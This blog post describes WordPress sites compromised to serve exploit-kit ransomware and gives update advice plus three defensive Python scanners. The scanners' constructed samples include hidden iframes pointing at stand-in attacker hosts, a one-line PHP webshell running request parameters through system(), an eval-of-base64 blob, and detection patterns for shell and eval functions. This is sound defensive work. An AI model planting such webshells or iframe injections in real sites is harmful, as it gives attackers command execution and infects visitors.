Unpatched WordPress Sites Used By Exploit Kits

The security firm Zscaler recently detected a large number of WordPress websites being used by exploit kits to deliver ransomware to those sites' visitors. Their blog post shows the scale of the problem and how many WordPress sites are currently affected. The attackers compromise the sites by exploiting vulnerable WordPress installations, install backdoors (see the aside below for a definition) and inject an iframe into the otherwise legitimate pages served to visitors, so that a visitor's browser silently loads the exploit kit's content as well as the page they asked for.

WordPress 4.2 and earlier contain security issues that allow sites running them to be compromised. WordPress addressed these issues with four security releases for the 4.2 branch between April and August this year.
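The injected iframe described above is the part of the compromise a site owner can see from the outside: fetch one of your own pages and look for iframes that a visitor's browser would load but never display. The following scanner is an added example written for this post (it is not code from Zscaler or from the original article); the hostnames and the sample page in it are constructed, and it treats an iframe as suspicious when it is zero-sized, hidden by CSS or pushed off-screen, noting in addition whether its src points at a host the site does not own.

```python
"""Find iframes that a visitor's browser would load but never see.

Added example, not code from the original post or from Zscaler. Exploit-kit
injections usually hide the iframe (zero size, display:none, pushed
off-screen) and point it at a host the site does not own. This scanner flags
iframes that are hidden and reports whether their src is third-party. All
hostnames and the sample page below are constructed for the example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
OFFSCREEN_CSS = re.compile(r"(?:left|top)\s*:\s*-\d+\s*px", re.I)


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def _pixels(value):
    """Leading integer of a width/height attribute, or None if absent."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def _is_third_party(src, site_host):
    """True when src names a host other than the site's own (relative URLs are first-party)."""
    host = urlparse(src).hostname
    return host is not None and host.lower() != site_host.lower()


def find_hidden_iframes(html, site_host):
    """Return [(src, [reasons])] for every iframe a visitor could not see."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        reasons = []
        width, height = _pixels(attrs.get("width")), _pixels(attrs.get("height"))
        if (width is not None and width <= 1) or (height is not None and height <= 1):
            reasons.append("zero-size")
        style = attrs.get("style", "")
        if HIDDEN_CSS.search(style):
            reasons.append("hidden by CSS")
        if OFFSCREEN_CSS.search(style):
            reasons.append("off-screen")
        if not reasons:
            continue  # a visible embed (video player, map) is not an injection
        src = attrs.get("src", "")
        if _is_third_party(src, site_host):
            reasons.append("third-party src")
        findings.append((src, reasons))
    return findings


# Constructed sample: one legitimate, visible embed plus two injected, hidden iframes.
SAMPLE_PAGE = """<html><body>
<p>Welcome to our shop.</p>
<iframe width="560" height="315" src="https://www.youtube.com/embed/abc"></iframe>
<iframe src="http://evil.example/gate.php" width="1" height="1" style="display:none"></iframe>
<div><iframe style="position:absolute; left:-5000px; top:0"
            src="//evil2.example/in.cgi?5"></iframe></div>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_hidden_iframes(SAMPLE_PAGE, "shop.example"):
        print(f"{src}: {', '.join(reasons)}")
```

Run it against the HTML of a few of your own pages (fetched with a plain HTTP client, not a logged-in browser, since some injections are only served to anonymous visitors). A hidden iframe pointing at a host you do not recognise is a strong sign the site has already been compromised, in which case updating WordPress alone is not enough; the injected code and any backdoor must be removed too.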

Why Should These Issues Be Considered Important?
Since visitors to your website could have their devices infected, which harms your visitors directly and your site's reputation (and, in turn, the number of visitors it receives), it is in your interest and theirs to address these security issues.

How Can I Protect Myself From These Issues?
If your website is powered by WordPress, or makes use of it, update to the latest version, which is 4.3 at the time of writing. This applies to the self-hosted, self-administered WordPress installation rather than to WordPress.com sites, which are administered by WordPress itself.

As mentioned in a previous blog post, if you have automatic updates enabled (available since version 3.7; thanks again to Sophos for that information) this update will be installed for you. Otherwise, open your WordPress dashboard and choose Updates -> Update Now.
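If you administer several self-hosted sites, it is worth checking from the server side both which core version is installed and whether someone has switched the automatic updates off. The script below is an added example written for this post, not code from the original article or from WordPress: it reads the version string from wp-includes/version.php and looks in wp-config.php for the two WordPress constants that disable background updates (AUTOMATIC_UPDATER_DISABLED and WP_AUTO_UPDATE_CORE). The file contents it scans are constructed samples, and the "latest" version it compares against is an assumed input (4.3 at the time of the post).

```python
"""Audit a self-hosted WordPress install's core version and update settings.

Added example, not from the original post or from WordPress itself. It reads
$wp_version from wp-includes/version.php and checks wp-config.php for the
constants that switch background updates off. The sample file contents below
are constructed; the 'latest' version is an assumed input.
"""
import re

LATEST_AT_TIME_OF_POST = "4.3"

_VERSION_RE = re.compile(r"\$wp_version\s*=\s*['\"]([^'\"]+)['\"]")
# define('AUTOMATIC_UPDATER_DISABLED', true) turns every background update off.
_UPDATER_OFF_RE = re.compile(
    r"define\s*\(\s*['\"]AUTOMATIC_UPDATER_DISABLED['\"]\s*,\s*true\s*\)", re.I)
# define('WP_AUTO_UPDATE_CORE', false) turns core updates off ('minor' and true are fine).
_CORE_UPDATES_OFF_RE = re.compile(
    r"define\s*\(\s*['\"]WP_AUTO_UPDATE_CORE['\"]\s*,\s*false\s*\)", re.I)


def installed_version(version_php):
    """Extract e.g. '4.2.4' from the contents of wp-includes/version.php."""
    m = _VERSION_RE.search(version_php)
    if not m:
        raise ValueError("no $wp_version assignment found")
    return m.group(1)


def version_key(version):
    """'4.2.4' -> (4, 2, 4) and '4.3' -> (4, 3, 0), so versions compare numerically."""
    parts = [int(p) for p in re.findall(r"\d+", version)][:3]
    return tuple(parts + [0] * (3 - len(parts)))


def audit_wordpress(version_php, wp_config, latest=LATEST_AT_TIME_OF_POST):
    """Return a list of findings; empty means up to date with background updates on."""
    findings = []
    installed = installed_version(version_php)
    if version_key(installed) < version_key(latest):
        findings.append(f"core {installed} is behind {latest}; update now")
    if _UPDATER_OFF_RE.search(wp_config):
        findings.append("AUTOMATIC_UPDATER_DISABLED is true: no background updates at all")
    elif _CORE_UPDATES_OFF_RE.search(wp_config):
        findings.append("WP_AUTO_UPDATE_CORE is false: security releases will not auto-install")
    return findings


# Constructed samples of the two files as they might look on a neglected site.
SAMPLE_VERSION_PHP = "<?php\n$wp_version = '4.2.4';\n"
SAMPLE_WP_CONFIG = (
    "<?php\n"
    "define('DB_NAME', 'wp');\n"
    "define( 'WP_AUTO_UPDATE_CORE', false );\n"
)

if __name__ == "__main__":
    for finding in audit_wordpress(SAMPLE_VERSION_PHP, SAMPLE_WP_CONFIG):
        print("-", finding)
```

On a real server, read the two files from the install's document root and pass their contents in; if either constant turns up, ask who set it and why before re-enabling updates, since a plugin or host may have its own reason for managing them.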

In addition, WordPress plugins such as Symposium, Google Analytics by Yoast Premium and the iframe plugin have been found to contain SQL injection and cross-site scripting (XSS) vulnerabilities. The security firm dxw Security provides advice and mitigations in its advisories for each plugin.

I hope that the above advice is useful to you in better securing your WordPress installations/websites from attack.

Thank you.

What is a backdoor?

A backdoor is the general name for a means by which an attacker can conveniently access devices or services within an organisation that they would not normally be able to reach, e.g. via a command shell (a Linux shell or the Windows Command Prompt).

Such a command shell allows them to enter commands that the victim device then carries out. This means of access bypasses the access controls that would normally protect the device or service, e.g. passwords, one-time passwords and smart cards.

An attacker will usually set up such a backdoor after initially compromising a company (e.g. with a spear-phishing email) so that they can return to the company network more conveniently in future to carry out further malicious actions.

Another means of accessing the device or service is via a remote access tool such as VNC or Microsoft Remote Desktop Protocol (RDP), or via the company's own VPN, which the attacker sets up or enables for easier access in future. The attacker will usually log in with an employee's credentials, compromised by some other means, so as to arouse as little suspicion as possible.

Please note that tools such as VNC and Microsoft RDP (among others) are not malicious in nature, but like almost everything in this world, legitimate tools can be put to malicious use.
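On a compromised WordPress site the backdoor is usually a small PHP file, or a few lines added to an existing one, that turns request parameters into code or shell commands so the attacker can return without logging in. The scanner below is an added example written for this post, not code from the original article or from WordPress; it flags the indicators most such webshells share (eval() over an obfuscated blob, shell or eval functions fed straight from request data, the old preg_replace /e trick, and any PHP file under wp-content/uploads, where WordPress never writes PHP itself). The sample files it scans are constructed, and scan_tree() is for running it over a real install.

```python
"""Hunt for PHP backdoors dropped into a WordPress tree.

Added example, not from the original post or from WordPress. It flags the
indicators most webshells share. The sample files below are constructed;
scan_tree() walks a real install on disk.
"""
import os
import re

INDICATORS = [
    ("eval of decoded blob",
     re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("eval of request data",
     re.compile(r"eval\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    # assert() is included because, in PHP, it evaluates a string argument as code.
    ("shell command from request",
     re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|assert)"
                r"\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("preg_replace /e code execution",
     re.compile(r"preg_replace\s*\(\s*['\"]/[^'\"]*/[a-z]*e[a-z]*['\"]", re.I)),
    ("long base64 blob", re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")),
]


def scan_file(path, text):
    """Return the indicator names that match one PHP file's contents or location."""
    hits = [name for name, pattern in INDICATORS if pattern.search(text)]
    norm = path.replace("\\", "/").lower()
    if "/wp-content/uploads/" in norm and norm.endswith(".php"):
        hits.append("PHP file in uploads directory")
    return hits


def scan_tree(root):
    """Walk a WordPress install on disk and yield (path, hits) for suspicious PHP files."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_file(path, fh.read())
            except OSError:
                continue
            if hits:
                yield path, hits


# Constructed sample files: one clean plugin file and two backdoors.
SAMPLE_FILES = {
    "/var/www/wp-content/plugins/hello.php":
        "<?php\nfunction hello_text() { return 'Hello'; }\n",
    "/var/www/wp-content/uploads/2015/08/cache.php":
        "<?php eval(base64_decode('ZWNobyAnaGknOw==')); ?>",
    "/var/www/wp-content/themes/twentyfifteen/footer.php":
        "<?php if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>\n</body></html>",
}

if __name__ == "__main__":
    for path, text in SAMPLE_FILES.items():
        hits = scan_file(path, text)
        if hits:
            print(f"{path}: {', '.join(hits)}")
```

Treat the output as leads rather than verdicts: some legitimate plugins match the base64 rule, so compare any flagged file against a clean copy of the same plugin or theme, and check file modification times around the date the injected iframe first appeared. Once a backdoor is confirmed, assume the attacker also has valid WordPress and database credentials and rotate them after cleaning up.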
